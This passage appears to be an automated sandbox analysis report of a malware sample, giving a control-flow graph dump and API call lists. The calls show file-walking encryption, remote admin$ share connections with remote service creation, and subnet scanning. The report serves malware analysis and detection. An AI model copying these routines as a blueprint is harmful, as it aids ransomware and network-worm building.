HeapFree 5679->5680 5681 4bf2f2a 5679->5681 5680->5675 5681->5680 5683 4bf2e08 5682->5683 5684 4bf29d5 GetProcessHeap HeapAlloc 5682->5684 5683->5479 5685 4bf29eb rand htons 5684->5685 5686 4bf2df6 GetProcessHeap HeapFree 5684->5686 5687 4bf2a7e rand 5685->5687 5686->5683 5687->5687 5688 4bf2a8d 5687->5688 5689 4bf2a91 rand send 5688->5689 5691 4bf2ae5 rand htons GetProcessHeap HeapAlloc 5688->5691 5689->5688 5690 4bf2ac5 recv 5689->5690 5690->5688 5690->5691 5692 4bf2de6 GetProcessHeap HeapFree 5691->5692 5693 4bf2b82 htons 5691->5693 5692->5686 5694 4bf2bbe rand 5693->5694 5694->5694 5695 4bf2bce GetProcessHeap HeapAlloc 5694->5695 5696 4bf2bec htons GetProcessHeap HeapAlloc 5695->5696 5697 4bf2dd6 GetProcessHeap HeapFree 5695->5697 5698 4bf2dc3 GetProcessHeap HeapFree 5696->5698 5699 4bf2c72 memcpy memcpy htons 5696->5699 5697->5692 5698->5697 5700 4bf2d0c memcpy 5699->5700 5700->5700 5701 4bf2d25 send 5700->5701 5702 4bf2dae GetProcessHeap HeapFree 5701->5702 5703 4bf2d3d send 5701->5703 5702->5698 5703->5702 5705 4bf2d55 5703->5705 5704 4bf2d83 recv 5704->5705 5706 4bf2d8c 5704->5706 5705->5702 5705->5704 5705->5706 5706->5702 5708 4bf31a2 rand 5707->5708 5709 4bf3201 5707->5709 5710 4bf31bd rand 5708->5710 5709->5470 5709->5482 5710->5710 5711 4bf31ca 5710->5711 5812 4bf2f5a GetProcessHeap HeapAlloc 5711->5812 5716 4bf32a7 5715->5716 5717 4bf3233 htons memcpy send 5715->5717 5716->5496 5718 4bf3297 GetProcessHeap HeapFree 5717->5718 5719 4bf3293 5717->5719 5718->5716 5719->5718 5721 4bf339b GetProcessHeap HeapFree 5720->5721 5722 4bf32e1 GetProcessHeap HeapAlloc 5720->5722 5721->5494 5721->5496 5723 4bf32fe htons memcpy send 5722->5723 5724 4bf3388 GetProcessHeap HeapFree 5722->5724 5725 4bf335a recv 5723->5725 5726 4bf3378 GetProcessHeap HeapFree 5723->5726 5724->5721 5725->5726 5727 4bf3372 5725->5727 5726->5724 5727->5726 5729 4bf33ce htons memcpy send 5728->5729 5730 4bf3441 5728->5730 5731 4bf342d 5729->5731 5732 4bf3431 GetProcessHeap HeapFree 
5729->5732 5730->5496 5731->5732 5732->5730 5734 4bf36ad GetProcessHeap HeapAlloc 5733->5734 5735 4bf3d03 5733->5735 5736 4bf3cf7 GetProcessHeap HeapFree 5734->5736 5737 4bf36c0 GetProcessHeap HeapAlloc 5734->5737 5735->5499 5784 4bf41e9 GetProcessHeap HeapAlloc 5735->5784 5736->5735 5738 4bf36dc 5737->5738 5739 4bf3ce1 GetProcessHeap HeapFree 5737->5739 5740 4bf3b39 5738->5740 5741 4bf36e8 5738->5741 5739->5736 5745 4bf3209 7 API calls 5740->5745 5742 4bf33a4 7 API calls 5741->5742 5743 4bf3745 5742->5743 5744 4bf3cd1 GetProcessHeap HeapFree 5743->5744 5746 4bf3787 5743->5746 5748 4bf33a4 7 API calls 5743->5748 5744->5739 5747 4bf3baa 5745->5747 5746->5744 5750 4bf379d Sleep 5746->5750 5747->5744 5749 4bf3bb2 Sleep 5747->5749 5748->5746 5751 4bf3bca 5749->5751 5752 4bf3209 7 API calls 5750->5752 5754 4bf3209 7 API calls 5751->5754 5753 4bf3806 5752->5753 5753->5744 5756 4bf3876 5753->5756 5759 4bf3209 7 API calls 5753->5759 5755 4bf3c5b 5754->5755 5755->5744 5758 4bf3c5f Sleep rand 5755->5758 5756->5744 5757 4bf3888 Sleep 5756->5757 5761 4bf33a4 7 API calls 5757->5761 5762 4bf3209 7 API calls 5758->5762 5760 4bf3841 5759->5760 5760->5756 5766 4bf33a4 7 API calls 5760->5766 5763 4bf38d2 5761->5763 5764 4bf3cbe 5762->5764 5763->5744 5767 4bf33a4 7 API calls 5763->5767 5764->5744 5765 4bf3cc2 Sleep 5764->5765 5765->5744 5766->5756 5768 4bf392c 5767->5768 5768->5744 5769 4bf3934 GetProcessHeap HeapAlloc 5768->5769 5769->5744 5770 4bf3953 memset 5769->5770 5771 4bf3209 7 API calls 5770->5771 5772 4bf3978 5771->5772 5773 4bf3b22 GetProcessHeap HeapFree 5772->5773 5774 4bf3980 recv 5772->5774 5773->5744 5774->5773 5775 4bf399b 5774->5775 5775->5773 5776 4bf39a8 htons 5775->5776 5776->5773 5777 4bf39c1 5776->5777 5777->5773 5778 4bf3209 7 API calls 5777->5778 5779 4bf3a88 5778->5779 5779->5773 5780 4bf3a90 Sleep rand 5779->5780 5781 4bf33a4 7 API calls 5780->5781 5782 4bf3b0f 5781->5782 5782->5773 5783 4bf3b13 Sleep 5782->5783 5783->5773 5785 4bf4679 5784->5785 5786 
4bf4217 5784->5786 5785->5499 5820 4bf40e3 GetProcessHeap HeapAlloc 5786->5820 5789 4bf4669 GetProcessHeap HeapFree 5789->5785 5792 4bf4271 GetProcessHeap HeapFree 5793 4bf4683 5792->5793 5794 4bf42a0 5792->5794 5796 4bf40e3 17 API calls 5793->5796 5795 4bf42e8 5794->5795 5797 4bf3d0d 45 API calls 5794->5797 5795->5789 5798 4bf3d0d 45 API calls 5795->5798 5811 4bf465e 5796->5811 5799 4bf42c7 5797->5799 5801 4bf431d 5798->5801 5799->5795 5800 4bf42cb GetProcessHeap HeapFree 5799->5800 5800->5795 5801->5789 5802 4bf4325 GetProcessHeap HeapFree 5801->5802 5803 4bf4351 5802->5803 5804 4bf3d0d 45 API calls 5803->5804 5805 4bf436e 5804->5805 5805->5789 5806 4bf4376 GetProcessHeap HeapFree memset 5805->5806 5806->5789 5807 4bf43c1 5806->5807 5808 4bf40e3 17 API calls 5807->5808 5809 4bf4641 5808->5809 5810 4bf40e3 17 API calls 5809->5810 5809->5811 5810->5811 5811->5789 5813 4bf2f89 GetProcessHeap HeapAlloc 5812->5813 5814 4bf3068 GetProcessHeap HeapFree 5812->5814 5815 4bf2fa6 htons memcpy send 5813->5815 5816 4bf3055 GetProcessHeap HeapFree 5813->5816 5814->5709 5817 4bf3045 GetProcessHeap HeapFree 5815->5817 5818 4bf3025 recv 5815->5818 5816->5814 5817->5816 5818->5817 5819 4bf303c 5818->5819 5819->5817 5821 4bf41e0 5820->5821 5822 4bf410b GetProcessHeap HeapAlloc 5820->5822 5821->5789 5833 4bf3d0d GetProcessHeap HeapAlloc 5821->5833 5824 4bf4158 5822->5824 5825 4bf41d4 GetProcessHeap HeapFree 5822->5825 5826 4bf3209 7 API calls 5824->5826 5825->5821 5827 4bf417b 5826->5827 5828 4bf417f Sleep 5827->5828 5829 4bf41c6 GetProcessHeap HeapFree 5827->5829 5830 4bf3209 7 API calls 5828->5830 5829->5825 5831 4bf41b3 5830->5831 5831->5829 5832 4bf41b7 Sleep 5831->5832 5832->5829 5834 4bf40da 5833->5834 5835 4bf3d41 GetProcessHeap HeapAlloc 5833->5835 5834->5789 5834->5792 5836 4bf40cb GetProcessHeap HeapFree 5835->5836 5837 4bf3d55 GetProcessHeap HeapAlloc 5835->5837 5836->5834 5838 4bf40bf GetProcessHeap HeapFree 5837->5838 5839 4bf3d72 5837->5839 5838->5836 5840 4bf3209 7 
API calls 5839->5840 5841 4bf3e4e 5840->5841 5842 4bf3e56 Sleep GetProcessHeap HeapAlloc 5841->5842 5843 4bf40b3 GetProcessHeap HeapFree 5841->5843 5842->5843 5844 4bf3e79 rand 5842->5844 5843->5838 5845 4bf32af 12 API calls 5844->5845 5846 4bf3ef0 5845->5846 5847 4bf409b GetProcessHeap HeapFree 5846->5847 5848 4bf3ef8 memset 5846->5848 5847->5843 5849 4bf3209 7 API calls 5848->5849 5850 4bf3f22 5849->5850 5850->5847 5851 4bf3f2a recv 5850->5851 5851->5847 5852 4bf3f46 5851->5852 5852->5847 5853 4bf3f50 htons 5852->5853 5853->5847 5854 4bf3f73 5853->5854 5855 4bf3209 7 API calls 5854->5855 5856 4bf3feb 5855->5856 5856->5847 5857 4bf3ff3 Sleep 5856->5857 5858 4bf3209 7 API calls 5857->5858 5859 4bf405a 5858->5859 5859->5847 5860 4bf405e Sleep GetProcessHeap HeapAlloc 5859->5860 5860->5847 5861 4bf4084 memcpy 5860->5861 5861->5847 5863 4bf4f38 5862->5863 5864 4bf4e89 5862->5864 5863->5557 5863->5562 5865 4bf2f5a 12 API calls 5864->5865 5866 4bf4ee8 5865->5866 5867 4bf4f2f GetProcessHeap HeapFree 5866->5867 5903 4bf3071 GetProcessHeap HeapAlloc 5866->5903 5867->5863 5870 4bf4f27 GetProcessHeap HeapFree 5870->5867 5872 4bf5014 5871->5872 5873 4bf4f6f 5871->5873 5872->5566 5872->5567 5873->5873 5874 4bf4f86 rand 5873->5874 5875 4bf2f5a 12 API calls 5874->5875 5876 4bf4fad 5875->5876 5877 4bf5004 GetProcessHeap HeapFree 5876->5877 5878 4bf3071 14 API calls 5876->5878 5877->5872 5880 4bf4fcb 5878->5880 5879 4bf4ff4 GetProcessHeap HeapFree 5879->5877 5880->5877 5880->5879 5882 4bf4b77 GetProcessHeap HeapAlloc 5881->5882 5884 4bf4c2e rand 5882->5884 5886 4bf4cff 5882->5886 5884->5886 5886->5574 5887 4bf501e 5886->5887 5888 4bf2f5a 12 API calls 5887->5888 5890 4bf5040 5888->5890 5889 4bf509b 5889->5574 5894 4bf50a2 GetProcessHeap HeapAlloc 5889->5894 5890->5889 5891 4bf3071 14 API calls 5890->5891 5893 4bf5060 5891->5893 5892 4bf508b GetProcessHeap HeapFree 5892->5889 5893->5889 5893->5892 5895 4bf50ca 5894->5895 5896 4bf5162 5894->5896 5897 4bf2f5a 12 API calls 5895->5897 
5896->5574 5898 4bf5117 5897->5898 5899 4bf5155 GetProcessHeap HeapFree 5898->5899 5900 4bf3071 14 API calls 5898->5900 5899->5896 5901 4bf513f 5900->5901 5901->5899 5902 4bf5143 GetProcessHeap HeapFree 5901->5902 5902->5899 5904 4bf309f GetProcessHeap HeapAlloc 5903->5904 5905 4bf3173 5903->5905 5906 4bf30b3 htons send 5904->5906 5907 4bf3160 GetProcessHeap HeapFree 5904->5907 5905->5867 5905->5870 5908 4bf3101 recv 5906->5908 5909 4bf3150 GetProcessHeap HeapFree 5906->5909 5907->5905 5908->5909 5910 4bf311c 5908->5910 5909->5907 5910->5909 5911 4bf3124 GetProcessHeap HeapAlloc 5910->5911 5911->5909 5912 4bf313f memcpy 5911->5912 5912->5909 5914 4bf6b90 5913->5914 5915 4bf6e29 EnterCriticalSection 5913->5915 5914->5346 5916 4bf6e39 5915->5916 5920 4bf6da4 5916->5920 5921 4bf6e13 LeaveCriticalSection 5920->5921 5922 4bf6db3 EnterCriticalSection 5920->5922 5921->5914 5923 4bf6e0b LeaveCriticalSection 5922->5923 5924 4bf6dc6 5922->5924 5923->5921 5925 4bf6df1 5924->5925 5927 4bf6aa8 5924->5927 5925->5923 5928 4bf6aca 5927->5928 5929 4bf6ab1 5927->5929 5928->5924 5929->5928 5930 4bf6ab7 StrCmpIW 5929->5930 5930->5928 5932 4bf634f LocalFree 5931->5932 5933 4bf62b9 5931->5933 5952 4bf5507 CryptAcquireContextW 5933->5952 5937 4bf6345 CloseHandle 5937->5932 5939 4bf633c CryptReleaseContext 5939->5937 5943 4bf6333 CryptDestroyKey 5943->5939 5946 4bf62ed CreateThread 5976 4bf5e9f 5946->5976 6053 4bf60f9 5946->6053 5947 4bf632a CryptDestroyKey 5947->5943 5950 4bf631f CryptDestroyHash 5950->5947 5951 4bf630f WaitForSingleObject CloseHandle 5951->5950 5953 4bf5528 GetLastError 5952->5953 5954 4bf5542 5952->5954 5953->5954 5955 4bf5535 CryptAcquireContextW 5953->5955 5954->5937 5956 4bf5613 CryptStringToBinaryW 5954->5956 5955->5954 5957 4bf56ce 5956->5957 5958 4bf5640 LocalAlloc 5956->5958 5957->5939 5966 4bf6085 CryptCreateHash 5957->5966 5958->5957 5959 4bf5655 CryptStringToBinaryW 5958->5959 5960 4bf5668 CryptDecodeObjectEx 5959->5960 5961 4bf56c5 LocalFree 5959->5961 
5960->5961 5962 4bf5688 LocalAlloc 5960->5962 5961->5957 5962->5961 5963 4bf5695 CryptDecodeObjectEx 5962->5963 5964 4bf56be LocalFree 5963->5964 5965 4bf56ac CryptImportPublicKeyInfo 5963->5965 5964->5961 5965->5964 5967 4bf60f1 5966->5967 5968 4bf60b0 CryptHashData 5966->5968 5967->5943 5972 4bf6246 CryptCreateHash 5967->5972 5968->5967 5969 4bf60c4 CryptDeriveKey CryptDestroyHash 5968->5969 5969->5967 5970 4bf60ea 5969->5970 5990 4bf559b CryptSetKeyParam CryptSetKeyParam CryptGetKeyParam 5970->5990 5973 4bf626a CryptHashData 5972->5973 5974 4bf6292 5972->5974 5973->5974 5975 4bf627d CryptGetHashParam 5973->5975 5974->5946 5974->5947 5975->5974 5977 4bf607d 5976->5977 5978 4bf5eb8 PathCombineW 5976->5978 5977->5950 5977->5951 5978->5977 5979 4bf5ed6 FindFirstFileW 5978->5979 5979->5977 5980 4bf5ef6 WaitForMultipleObjects 5979->5980 5981 4bf6073 FindClose 5980->5981 5985 4bf5f17 5980->5985 5981->5977 5982 4bf605c FindNextFileW 5982->5980 5982->5981 5983 4bf5fa1 PathCombineW 5983->5982 5983->5985 5984 4bf6016 PathFindExtensionW 5984->5985 5985->5981 5985->5982 5985->5983 5985->5984 5986 4bf5fdf StrStrIW 5985->5986 5987 4bf5e9f 36 API calls 5985->5987 5995 4bf5d0a CryptDuplicateKey 5985->5995 6018 4bf59b1 5985->6018 5986->5982 5986->5985 5987->5985 5991 4bf560c 5990->5991 5992 4bf55e4 5990->5992 5991->5967 5992->5991 5993 4bf55e9 LocalAlloc 5992->5993 5993->5991 5994 4bf55fb CryptSetKeyParam LocalFree 5993->5994 5994->5991 5996 4bf5e98 5995->5996 5997 4bf5d38 CreateFileW 5995->5997 5996->5982 5998 4bf5e7c CryptDestroyKey 5997->5998 5999 4bf5d58 GetFileSizeEx 5997->5999 5998->5996 6000 4bf5e8a 5998->6000 6001 4bf5da2 CreateFileMappingW 5999->6001 6007 4bf5d78 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 5999->6007 6000->5996 6004 4bf5e8f SetEvent 6000->6004 6002 4bf5e6e FindCloseChangeNotification 6001->6002 6003 4bf5dcd 6001->6003 6002->5998 6022 4bf5a73 GetSystemInfo 6003->6022 6004->5996 6007->6001 6008 4bf5e4c 6010 4bf5e51 FindCloseChangeNotification 6008->6010 
6009 4bf5df3 MapViewOfFile 6009->6008 6011 4bf5e0a CryptEncrypt 6009->6011 6010->6002 6012 4bf5e5e 6010->6012 6013 4bf5e26 FlushViewOfFile 6011->6013 6014 4bf5e32 UnmapViewOfFile 6011->6014 6048 4bf5a11 GetFileSizeEx 6012->6048 6013->6014 6014->6010 6016 4bf5e3f 6014->6016 6036 4bf5bc4 GetSystemInfo 6016->6036 6019 4bf59c5 6018->6019 6019->6019 6020 4bf59eb StrStrIW 6019->6020 6021 4bf5a09 6020->6021 6021->5985 6023 4bf5ac8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6022->6023 6024 4bf5adb MapViewOfFile 6023->6024 6025 4bf5afb 6024->6025 6026 4bf5bba 6024->6026 6027 4bf5baa 6025->6027 6028 4bf5b26 CryptDuplicateHash 6025->6028 6026->6008 6026->6009 6029 4bf5bb1 UnmapViewOfFile 6027->6029 6028->6029 6030 4bf5b3c CryptHashData 6028->6030 6029->6026 6031 4bf5b9f CryptDestroyHash 6030->6031 6032 4bf5b53 LocalAlloc 6030->6032 6031->6029 6032->6031 6033 4bf5b6b CryptGetHashParam 6032->6033 6034 4bf5b98 LocalFree 6033->6034 6035 4bf5b84 6033->6035 6034->6031 6035->6034 6037 4bf5c19 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6036->6037 6038 4bf5c2c MapViewOfFile 6037->6038 6039 4bf5c4e CryptDuplicateHash 6038->6039 6040 4bf5d00 6038->6040 6041 4bf5c6b CryptHashData 6039->6041 6042 4bf5cf7 UnmapViewOfFile 6039->6042 6040->6008 6043 4bf5c7f LocalAlloc 6041->6043 6044 4bf5cee CryptDestroyHash 6041->6044 6042->6040 6043->6044 6045 4bf5c98 CryptGetHashParam 6043->6045 6044->6042 6046 4bf5cae memcpy FlushViewOfFile 6045->6046 6047 4bf5ce5 LocalFree 6045->6047 6046->6047 6047->6044 6049 4bf5a6b 6048->6049 6050 4bf5a33 6048->6050 6049->6002 6050->6049 6051 4bf5a45 SetFilePointerEx 6050->6051 6051->6049 6052 4bf5a60 SetEndOfFile 6051->6052 6052->6049 6054 4bfa760 6053->6054 6055 4bf6106 wsprintfW PathCombineW 6054->6055 6056 4bf6144 6055->6056 6059 4bf623d 6055->6059 6072 4bf6477 GetTickCount 6056->6072 6058 4bf614a 6058->6059 6060 4bf615a WaitForMultipleObjects 6058->6060 6060->6059 6061 4bf617e CreateFileW 6060->6061 6062 4bf623c 6061->6062 6063 4bf61a2 6061->6063 6062->6059 
6073 4bf57e5 6063->6073 6066 4bf61bb memset StrCatW StrCatW 6068 4bf61fc 6066->6068 6067 4bf6235 CloseHandle 6067->6062 6068->6068 6069 4bf6207 WriteFile 6068->6069 6070 4bf622c LocalFree 6069->6070 6071 4bf6225 FlushFileBuffers 6069->6071 6070->6067 6071->6070 6072->6058 6074 4bf57fd LocalAlloc 6073->6074 6075 4bf59a8 6073->6075 6074->6075 6076 4bf5818 GetSystemDefaultLCID GetTimeZoneInformation 6074->6076 6075->6066 6075->6067 6077 4bf5838 6076->6077 6078 4bf5841 memcpy NetWkstaGetInfo 6076->6078 6077->6078 6079 4bf58fe 6078->6079 6085 4bf586f 6078->6085 6094 4bf56d8 6079->6094 6082 4bf5918 LocalAlloc 6083 4bf5992 LocalFree 6082->6083 6088 4bf5930 memcpy 6082->6088 6083->6075 6084 4bf58cf 6087 4bf58f2 NetApiBufferFree 6084->6087 6090 4bf58de memcpy 6084->6090 6085->6084 6086 4bf58bc memcpy 6085->6086 6086->6084 6087->6079 6091 4bf595a 6088->6091 6090->6087 6091->6091 6102 4bf5780 CryptBinaryToStringW 6091->6102 6095 4bf56ef 6094->6095 6098 4bf5776 6094->6098 6096 4bf56f7 CryptEncrypt 6095->6096 6095->6098 6097 4bf571a LocalAlloc 6096->6097 6096->6098 6097->6098 6099 4bf5731 memcpy CryptEncrypt 6097->6099 6098->6082 6098->6083 6099->6098 6100 4bf5759 LocalFree 6099->6100 6100->6098 6103 4bf57ce LocalFree 6102->6103 6104 4bf57a4 LocalAlloc 6102->6104 6103->6083 6104->6103 6105 4bf57b9 CryptBinaryToStringW 6104->6105 6105->6103 6106 4bf57d5 LocalFree 6105->6106 6106->6103 6108 4bf80fa 6107->6108 6108->6108 6109 4bf8106 wsprintfW 6108->6109 6110 4bf7fb7 6 API calls 6109->6110 6111 4bf8142 6110->6111 6111->5080 6111->5081 6113 4bf8183 CreateToolhelp32Snapshot 6112->6113 6113->5090 6113->5091 6115 4bfa05f 6114->6115 6116 4bfa046 DuplicateTokenEx 6114->6116 6117 4bf6c5f 13 API calls 6115->6117 6116->6115 6118 4bfa07a 6117->6118 6137 4bf75d8 WNetOpenEnumW 6118->6137 6123 4bf6cc8 3 API calls 6124 4bfa08e 6123->6124 6125 4bf6b0e 7 API calls 6124->6125 6134 4bfa09a 6125->6134 6126 4bfa0e5 6128 4bfa0fb 6126->6128 6129 4bfa0f1 CloseHandle 6126->6129 6130 4bfa107 6128->6130 

                                              Control-flow Graph (graph image not reproduced; the original highlights executed and not-executed basic blocks)
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF957E
                                                • Part of subcall function 04BF88D3: PathFindFileNameW.SHLWAPI(04C07BC8,75A373E0,?,04BF95B2), ref: 04BF88E3
                                              • wsprintfW.USER32 ref: 04BF95C9
                                              • wsprintfW.USER32 ref: 04BF95EF
                                              • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 04BF95FC
                                              • wsprintfW.USER32 ref: 04BF961A
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04BF9637
                                              • PathFileExistsW.SHLWAPI(?), ref: 04BF9649
                                              • GetLastError.KERNEL32 ref: 04BF9653
                                              • GetLastError.KERNEL32(?), ref: 04BF9674
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF96B9
                                              • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 04BF9714
                                              • memset.MSVCRT ref: 04BF9735
                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF9742
                                              • wsprintfW.USER32 ref: 04BF975A
                                              • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 04BF9783
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04BF9798
                                              • GetLastError.KERNEL32 ref: 04BF97A6
                                              • QueryServiceStatus.ADVAPI32(?,?), ref: 04BF97D5
                                              • Sleep.KERNEL32(00001388), ref: 04BF97E7
                                              • DeleteService.ADVAPI32(?), ref: 04BF97F7
                                              • CloseServiceHandle.ADVAPI32(?), ref: 04BF9801
                                              • GetLastError.KERNEL32 ref: 04BF9809
                                              • CloseServiceHandle.ADVAPI32(?), ref: 04BF9822
                                              • GetLastError.KERNEL32 ref: 04BF982A
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,75A373E0,00000000), ref: 04BF68EB
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF68F4
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6921
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,771AE010), ref: 04BF6946
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF6949
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6978
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BF6995
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF6998
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04BF699F
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF69A2
                                              • DeleteFileW.KERNEL32(?), ref: 04BF983E
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF9857
                                              • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04BFA0AD,00000000,00000000,00000000,00000000,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8), ref: 04BF9878
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                              • String ID: %08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                              • API String ID: 719309661-1529897384
                                              • Opcode ID: ec7c980df0497e392a4a45365dd8d345f1714d8e4cfc13ce9a325bb740526ea3
                                              • Instruction ID: f122748c4973288663fb31bd0226167efbdebad9cd92ebf63985b1ebac6759a2
                                              • Opcode Fuzzy Hash: ec7c980df0497e392a4a45365dd8d345f1714d8e4cfc13ce9a325bb740526ea3
                                              • Instruction Fuzzy Hash: A39108B1508345ABEB209F64DC88B9BB7ECEF84744F40096EF649C3150E774E9488BA2

                                              Control-flow Graph (graph image not reproduced; the original highlights executed and not-executed basic blocks)
                                              APIs
                                              • memset.MSVCRT ref: 04BF8B52
                                              • memset.MSVCRT ref: 04BF8B6F
                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04BF8B8F
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04BF8BA0
                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04BF8BBA
                                              • inet_addr.WS2_32(000001B0), ref: 04BF8BDF
                                              • inet_addr.WS2_32(000001C0), ref: 04BF8BF3
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                                • Part of subcall function 04BF641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                                • Part of subcall function 04BF641A: HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 04BF8C24
                                              • HeapFree.KERNEL32(00000000), ref: 04BF8C2B
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 04BF8C5C
                                              • HeapFree.KERNEL32(00000000), ref: 04BF8C63
                                              • LocalAlloc.KERNEL32(00000040,0000000C), ref: 04BF8C98
                                              • inet_addr.WS2_32(255.255.255.255), ref: 04BF8CA9
                                              • htonl.WS2_32(?), ref: 04BF8CD0
                                              • htonl.WS2_32(?), ref: 04BF8CD8
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00008AB3,00000000,00000000,00000000), ref: 04BF8CED
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04BF8D17
                                              • LocalFree.KERNEL32(?), ref: 04BF8D28
                                              Similarity
                                              • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$ChangeCloseCreateFindNotificationThread
                                              • String ID: 255.255.255.255
                                              • API String ID: 569246953-2422070025
                                              • Opcode ID: ec9a0b3548fb728821dfc45a25d4649b91c99f8b6bcd52f545b38424b69ebac4
                                              • Instruction ID: 291a176444f33468f986f362de8d933cb7caa9a1fd6a08c2a3af17432ed04a61
                                              • Opcode Fuzzy Hash: ec9a0b3548fb728821dfc45a25d4649b91c99f8b6bcd52f545b38424b69ebac4
                                              • Instruction Fuzzy Hash: 38516AB1904306AFD710EF64DC8496EBBE9FF88314F10496EFA9997100D734E9598BA2

                                              Control-flow Graph (graph image not reproduced; the original highlights executed and not-executed basic blocks)
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000010,77735E70,?,771AF380), ref: 04BF15D9
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF15E2
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 04BF1603
                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 04BF1633
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF1636
                                              • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 04BF166E
                                              • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 04BF1688
                                              • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 04BF169C
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF16AD
                                              • HeapFree.KERNEL32(00000000), ref: 04BF16B4
                                              • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 04BF16CA
                                              • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 04BF16E8
                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 04BF1701
                                              • CryptDestroyHash.ADVAPI32(?), ref: 04BF171A
                                              • CryptDestroyKey.ADVAPI32(?), ref: 04BF1728
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04BF1737
                                              Strings
                                              • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04BF15F8
                                              Similarity
                                              • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                              • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                              • API String ID: 2620112963-1948191093
                                              • Opcode ID: ada603228794e4692d907979f411f858002c7cf0ed31055dcb4ce494f626fadd
                                              • Instruction ID: 8dc8fa1cbe083a3e6cc5eabe4b72fe8094ed717737a6cc0143330314a374f340
                                              • Opcode Fuzzy Hash: ada603228794e4692d907979f411f858002c7cf0ed31055dcb4ce494f626fadd
                                              • Instruction Fuzzy Hash: F2516A71A00219FBEF108FA9DC48A9EBB79FF08750F004495FA0AE6190DB709E05DBA0

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 04BF7025
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF7028
                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 04BF703C
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04BF7051
                                              • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 04BF706F
                                              • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 04BF707F
